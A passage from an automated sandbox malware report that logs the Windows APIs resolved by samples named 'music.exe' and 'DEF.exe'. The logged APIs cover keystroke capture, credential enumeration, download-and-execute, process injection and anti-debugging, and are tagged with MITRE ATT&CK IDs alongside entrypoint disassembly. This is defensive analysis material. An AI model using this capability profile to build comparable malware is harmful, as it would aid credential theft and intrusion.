\"music.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetBestRoute (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetAsyncKeyState (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetKeyState (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetForegroundWindow (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetActiveWindow (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetWindowTextA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetWindowTextW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter SystemParametersInfoA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter SystemParametersInfoW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CredEnumerateA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CredEnumerateW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatusEx (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter ChangeServiceConfigA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter ChangeServiceConfigW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithTokenW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter LsaLookupSids (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter SystemFunction032 (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter SystemFunction033 (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetOpenA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetOpenW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter HttpOpenRequestA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter HttpOpenRequestW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetConnectA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetConnectW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetQueryOptionA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetQueryOptionW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetSetOptionA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetSetOptionW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetReadFile (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter URLDownloadToFileA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter URLDownloadToFileW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter ObtainUserAgentString (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter ShellExecuteW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptEncrypt (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptDecrypt (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptExportKey (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptGenKey (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptEncrypt (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptDecrypt (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptImportKey (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptImportKeyPair (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptExportKey (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptGenerateKeyPair (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptOpenAlgorithmProvider (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptSetProperty (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter RpcServerRegisterIf (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter RpcServerRegisterIf2 (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter RpcServerUseProtseqEpW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter gethostname (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter LoadLibraryW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter FindFirstFileA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter FindFirstFileW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter FindNextFileA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter FindNextFileW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter Process32FirstW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter Process32NextW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateRemoteThread (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetNativeSystemInfo (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetLogicalDriveStringsA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetLogicalDriveStringsW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CopyFileA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CopyFileW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateDirectoryA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateDirectoryW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter RemoveDirectoryA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter RemoveDirectoryW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter WinExec (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter FindResourceA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter FindResourceW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter LoadResource (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateProcessW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter OpenMutexA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter OpenMutexW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLangID (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter SetFileTime (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter MoveFileA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetWriteWatch (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter HeapWalk (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GlobalMemoryStatusEx (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter IsNativeVhdBoot (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter DebugBreak (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter RtlGetNtProductType (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter LdrLoadDll (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter LdrUnloadDll (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter LdrGetDllHandle (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter LdrGetProcedureAddress (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter RtlAddVectoredExceptionHandler (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter NtSystemDebugControl (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter RtlCompressBuffer (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter RtlDecompressBuffer (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter RtlDecompressBufferEx (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateCompatibleBitmap (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetDeviceCaps (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetIpNetTable (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetAdaptersInfo (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetTcpTable2 (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetBestRoute (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetAsyncKeyState (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetKeyState (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetForegroundWindow (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetActiveWindow (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetWindowTextA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetWindowTextW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter SystemParametersInfoA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter SystemParametersInfoW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CredEnumerateA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CredEnumerateW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatusEx (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter ChangeServiceConfigA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter ChangeServiceConfigW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithTokenW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter LsaLookupSids (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter SystemFunction032 (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter SystemFunction033 (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetOpenA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetOpenW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter HttpOpenRequestA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter HttpOpenRequestW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetConnectA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetConnectW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetQueryOptionA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetQueryOptionW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetSetOptionA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetSetOptionW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter InternetReadFile (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter URLDownloadToFileA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter URLDownloadToFileW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter ObtainUserAgentString (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter ShellExecuteW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptEncrypt (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptDecrypt (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptExportKey (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter CryptGenKey (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptEncrypt (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptDecrypt (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptImportKey (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptImportKeyPair (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptExportKey (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptGenerateKeyPair (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptOpenAlgorithmProvider (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter BCryptSetProperty (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter RpcServerRegisterIf (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter RpcServerRegisterIf2 (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter RpcServerUseProtseqEpW (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter gethostname (UID: 00000000-00004492)\n \"music.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004492)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"DEF.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"music.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.6712F542.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"09000a0008ce4600@Rstrtmgr.DLL\"\n \"0d000e00843b446b@Iphlpapi.DLL\"\n \"0f001000dc3b446b@Iphlpapi.DLL\"\n \"0c000d00243c446b@Iphlpapi.DLL\"\n \"140015006c3c446b@Iphlpapi.DLL\"\n \"0c000d00e03c446b@Iphlpapi.DLL\"\n \"15001600c02e446b@ADVAPI32.dll\"\n \"0e000f00702f446b@ADVAPI32.dll\"\n \"0e000f00cc2f446b@ADVAPI32.dll\"\n \"11001200b437446b@ADVAPI32.dll\"\n \"110012004838446b@ADVAPI32.dll\"\n \"120013008c38446b@ADVAPI32.dll\"\n \"12001300e438446b@ADVAPI32.dll\"\n \"14001500385e446b@ADVAPI32.dll\"\n \"14001500505e446b@ADVAPI32.dll\"\n \"14001500685e446b@ADVAPI32.dll\"\n \"17001800805e446b@ADVAPI32.dll\"\n \"0d000e00985e446b@ADVAPI32.dll\"\n \"11001200a85e446b@ADVAPI32.dll\"\n \"11001200bc5e446b@ADVAPI32.dll\"\n \"0d000e004456446b@WININET.dll\"\n \"0d000e00b456446b@WININET.dll\"\n \"10001100ec56446b@WININET.dll\"\n \"100011009057446b@WININET.dll\"\n \"10001100005f446b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"DEF.exe\" file has an entrypoint instructions - \"call\t0x434ecb,jmp\t0x434918,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\tesi,push\t0x17,call\t0x45717a,test\teax, eax,je\t0x434aa5,mov\tecx, dword ptr [ebp + 8],int\t0x29,xor\tesi, esi,lea\teax, [ebp - 0x324],push\t0x2cc,push\tesi,push\teax,mov\tdword ptr [0x471d14], esi,call\t0x436f10,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"\n \"music.exe\" file has an entrypoint instructions - \"call\t0x434ecb,jmp\t0x434918,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\tesi,push\t0x17,call\t0x45717a,test\teax, eax,je\t0x434aa5,mov\tecx, dword ptr [ebp + 8],int\t0x29,xor\tesi, esi,lea\teax, [ebp - 0x324],push\t0x2cc,push\tesi,push\teax,mov\tdword ptr [0x471d14], esi,call\t0x436f10,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"\n \"DISMHOST.EXE.6712F542.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"DEF.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\db (UID: 00000000-00006032)\n \"DEF.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006032)\n \"music.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\db (UID: 00000000-00006012)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"DEF.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76BA0000\n \"music.exe\" loaded module 